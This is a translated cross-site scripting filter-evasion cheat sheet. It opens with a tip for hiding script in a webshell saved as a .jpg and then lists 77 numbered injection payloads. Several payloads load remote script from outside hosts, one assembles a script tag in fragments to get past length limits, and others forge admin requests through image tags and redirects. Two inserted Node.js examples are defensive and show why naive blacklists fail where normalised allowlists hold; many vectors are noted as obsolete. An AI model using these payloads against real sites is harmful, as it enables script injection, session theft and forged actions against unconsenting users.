Cross-site image shell

XSS cross-site test code: <script>alert("")</script>

Put that line at the top of the webshell and save the shell with a .jpg extension; when the "image" is requested, the script still runs in the visitor's browser. This works only because old Internet Explorer sniffed the response body and rendered it as HTML instead of honouring the image type; a browser that respects the Content-Type (and any server that sends X-Content-Type-Options: nosniff) will not execute it.

The list below is the classic filter-evasion cheat sheet. Many of the javascript:, vbscript: and expression() vectors depend on Internet Explorer 6/7-era parsing and no longer fire in current browsers, but the entity-encoding, whitespace and tag-mangling tricks they rely on are still exactly what an input filter has to normalise before it can reason about a value.
(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using the javascript: directive
<IMG SRC="javascript:alert('XSS');">

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, mixed case (the scheme is case-insensitive)
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entities (the semicolons are required here)
<IMG SRC=javascript:alert(&quot;XSS&quot;)>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode (88,83,83 spells XSS; build it with a character-code calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) Decimal Unicode entities (character-code calculator)
<IMG SRC=jav..omitted..S')>

(9) Long decimal entities with no semicolons (character-code calculator)
<IMG SRC=jav..omitted..S')>

(10) Hex entities, also with no semicolons (character-code calculator)
<IMG SRC=java..omitted..XSS')>

(11) Embedded tab splitting the word "javascript" (a literal tab between "jav" and "ascript")
<IMG SRC="jav	ascript:alert('XSS');">

(12) Embedded encoded tab
<IMG SRC="jav&#x09;ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav&#x0A;ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav&#x0D;ascript:alert('XSS');">

(15) Multi-line injected JavaScript, the extreme form of the above: the payload broken across many lines using only the whitespace characters from (11)-(14)
<IMG SRC="javascript:alert('XSS')">

(16) Working around an input length limit (all fragments must land on the same page, in this order)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2 (in practice the null-byte variants rarely work, since few inputs pass a raw NUL through to the parser)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the javascript: in an IMG tag
<IMG SRC=" &#14;  javascript:alert('XSS');">
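Items (4) through (19) are all the same lesson: a filter that looks for the literal string "javascript:" is checking the bytes it was given, not the URL the browser will derive from them. The following is an added example (not part of the original list) showing a naive blacklist beside an allowlist that first decodes entities and strips the whitespace a URL parser strips; the payloads are constructed here from those items, and the scheme allowlist is an assumption for the demo.

```javascript
// Added example, not part of the original list: why a filter that looks for
// the literal string "javascript:" misses the IMG SRC variants in items (4)
// through (19), and what has to happen before a scheme check means anything.
// Plain Node.js; every payload below is constructed here from those items.

// Lenient HTML character-reference decoding, the way a browser's tokenizer
// does it: &#106; &#x6A; with or without the trailing semicolon (items 8-10)
// plus the handful of named references that matter for URLs.
const NAMED = { quot: '"', amp: '&', lt: '<', gt: '>', apos: "'", Tab: '\t', NewLine: '\n' };
function decodeEntities(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (whole, body) => {
    if (body[0] !== '#') {
      return Object.prototype.hasOwnProperty.call(NAMED, body) ? NAMED[body] : whole;
    }
    const cp = /^#x/i.test(body) ? parseInt(body.slice(2), 16) : parseInt(body.slice(1), 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : whole;
  });
}

// What the URL parser does before reading the scheme: drop leading C0
// controls and spaces (item 19's " &#14;  javascript:") and delete every ASCII
// tab, LF and CR anywhere in the string (items 11-14's "jav&#x09;ascript:").
function normalizeUrl(attrValue) {
  return decodeEntities(attrValue)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+/, '');
}

// The filter the cheat sheet is written against: block values that start
// with "javascript:" (any case) and let everything else through.
function naiveFilterAllows(attrValue) {
  return !/^\s*javascript:/i.test(attrValue);
}

// Allowlist after normalization (the allowed set is an assumption for the
// demo). No scheme, i.e. a relative URL, is fine; any control character that
// survives normalization (item 17's embedded NUL, which old parsers silently
// skipped) is rejected instead of reasoned about.
const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);
function allowlistAllows(attrValue) {
  const u = normalizeUrl(attrValue);
  if (/[\u0000-\u001f]/.test(u)) return false;
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(u);
  return m === null || ALLOWED_SCHEMES.has(m[1].toLowerCase());
}

// Constructed payloads, one per evasion family in the items above.
const encode = (s, fmt) => [...s].map(c => fmt(c.codePointAt(0))).join('');
const PAYLOADS = {
  mixedCase:       'JaVaScRiPt:alert(1)',                                                 // (4)
  htmlQuotes:      'javascript:alert(&quot;XSS&quot;)',                                   // (5)
  decimalEntities: encode('javascript:alert(1)', n => `&#${n};`),                         // (8)
  decimalNoSemi:   encode('javascript:alert(1)', n => `&#${String(n).padStart(7, '0')}`), // (9)
  hexNoSemi:       encode('javascript:alert(1)', n => `&#x${n.toString(16)}`),            // (10)
  literalTab:      'jav\tascript:alert(1)',                                               // (11)
  encodedTab:      'jav&#x09;ascript:alert(1)',                                           // (12)
  encodedNewline:  'jav&#x0A;ascript:alert(1)',                                           // (13)
  leadingControl:  ' &#14;  javascript:alert(1)',                                         // (19)
  embeddedNul:     'java\u0000script:alert(1)',                                           // (17)
};

// Names of the payloads a given filter lets through.
function missedBy(filter) {
  return Object.keys(PAYLOADS).filter(name => filter(PAYLOADS[name]));
}

console.log('naive blacklist lets through:', missedBy(naiveFilterAllows));
console.log('allowlist lets through:', missedBy(allowlistAllows));
```

The naive filter catches only the mixed-case and entity-quoted variants; every encoded, whitespace-split, control-prefixed or NUL-containing payload passes it, while the decode-then-allowlist check passes none of them and still accepts ordinary http(s) and relative links.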
(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, variant 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, variant 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and a few other browsers)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2 (protocol-relative URL)
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escapes (the value lands inside a double-quoted JS string, and the filter only backslash-escapes quotes)
\";alert('XSS');//

(30) Ending the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh with an extra URL parameter
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with an extra character in front of the URL (any of the decimal code points 1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with expression()
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous tag with STYLE (any element name works: an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image via a class
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with the expression keyword split by a comment
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash movie that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) Inside Flash, ActionScript can assemble the XSS code at run time
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace; the .HTC file must be on the same server as the XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, put the JavaScript in a file with an image name and point SRC at it; the browser does not care about the extension
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command: the victim's browser sends a GET to this URL with the victim's own cookies, so any state-changing GET endpoint on that site is triggered (this is CSRF, not arbitrary command execution)
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command via a redirect (a.jpg sits on the same server as the IMG tag): an .htaccess Redirect bounces the innocent-looking image URL to the admin action
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Bypassing a filter on the ">" character (61 to 67 are variants)
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" '' SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL string evasion: an IP address instead of a hostname
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding (the hostname percent-encoded)
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>

(70) IP as a single decimal number (3232235521 is 192.168.0.1)
<A HREF="http://3232235521">XSS</A>

(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding: a newline after the "h", tabs after "tt" and after the first "6", and the four octets written in decimal, octal, hex and decimal (66.000146.0x7.147 is 66.102.7.147)
<A HREF="h
tt	p://6	6.000146.0x7.147/">XSS</A>

(74) Dropping the scheme (protocol-relative URL)
<A HREF="//www.google.com/">XSS</A>

(75) Dropping the www
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name (trailing dot)
<A HREF="http://www.google.com./">XSS</A>

(77) javascript: link that sets the location
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
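Items (68) through (76) all target a filter that compares the host as a string. The following added example (not from the original list) spells out the IPv4 parsing rules a browser applies, shows that the platform URL parser already canonicalises every spelling above (including the tab- and newline-laced one), and compares destinations on that canonical form. The inputs are the ones from those items; the default base URL is an assumption for resolving the scheme-relative link.

```javascript
// Added example, not part of the original list, for items (68) through (76):
// browsers parse the host of a URL with inet_aton-style rules, so one address
// has many spellings and a filter that compares host strings is bypassed by
// any of them. parseIpv4Host() spells out those rules; canonicalHost() shows
// that the platform URL parser (same algorithm as the browser) already does
// this and is what an allowlist should compare against. Plain Node.js; the
// inputs are the ones from the items above.

// One IPv4 host as the WHATWG URL parser reads it: 1 to 4 dot-separated
// parts, each decimal, 0x-hex or leading-zero octal; the last part fills all
// remaining bytes (so a single number is the whole 32-bit address, item 70).
// Returns dotted-decimal, or null when the string is not an IPv4 address.
function parseIpv4Host(host) {
  const parts = host.replace(/\.$/, '').split('.');
  if (parts.length === 0 || parts.length > 4) return null;
  const nums = [];
  for (const p of parts) {
    if (/^0x[0-9a-f]+$/i.test(p)) nums.push(parseInt(p.slice(2), 16));   // (71)
    else if (/^0[0-7]+$/.test(p)) nums.push(parseInt(p, 8));              // (72)
    else if (/^[0-9]+$/.test(p)) nums.push(parseInt(p, 10));              // (70)
    else return null;                                                     // a DNS name
  }
  const last = nums.pop();
  if (nums.some(n => n > 255) || last >= 256 ** (4 - nums.length)) return null;
  const value = nums.reduce((acc, n, i) => acc + n * 256 ** (3 - i), last);
  return [value >>> 24, (value >>> 16) & 255, (value >>> 8) & 255, value & 255].join('.');
}

// What the browser actually does: new URL() strips ASCII tabs and newlines
// (item 73), resolves scheme-relative references against the page (74),
// percent-decodes the host (69) and canonicalises IPv4 spellings (70-72).
// The trailing dot of item 76 names the same DNS entry, so it is dropped
// before comparing. The base URL is an assumption for the demo.
function canonicalHost(href, base = 'http://3w.org/') {
  return new URL(href, base).hostname.replace(/\.$/, '');
}

// Two links point at the same host once both are canonicalised.
function sameDestination(hrefA, hrefB) {
  return canonicalHost(hrefA) === canonicalHost(hrefB);
}

const LINKS = [
  'http://3232235521',                 // (70)
  'http://0xc0.0xa8.0x00.0x01',        // (71)
  'http://0300.0250.0000.0001',        // (72)
  'h\ntt\tp://6\t6.000146.0x7.147/',   // (73)
  '//www.google.com/',                 // (74)
  'http://www.google.com./',           // (76)
];
for (const link of LINKS) console.log(JSON.stringify(link), '->', canonicalHost(link));
```

Three of the six spellings resolve to 192.168.0.1 and the mixed one to 66.102.7.147; a string allowlist of "trusted hosts" that does not go through this step is matched against whichever spelling the attacker chose, not the host the browser will connect to.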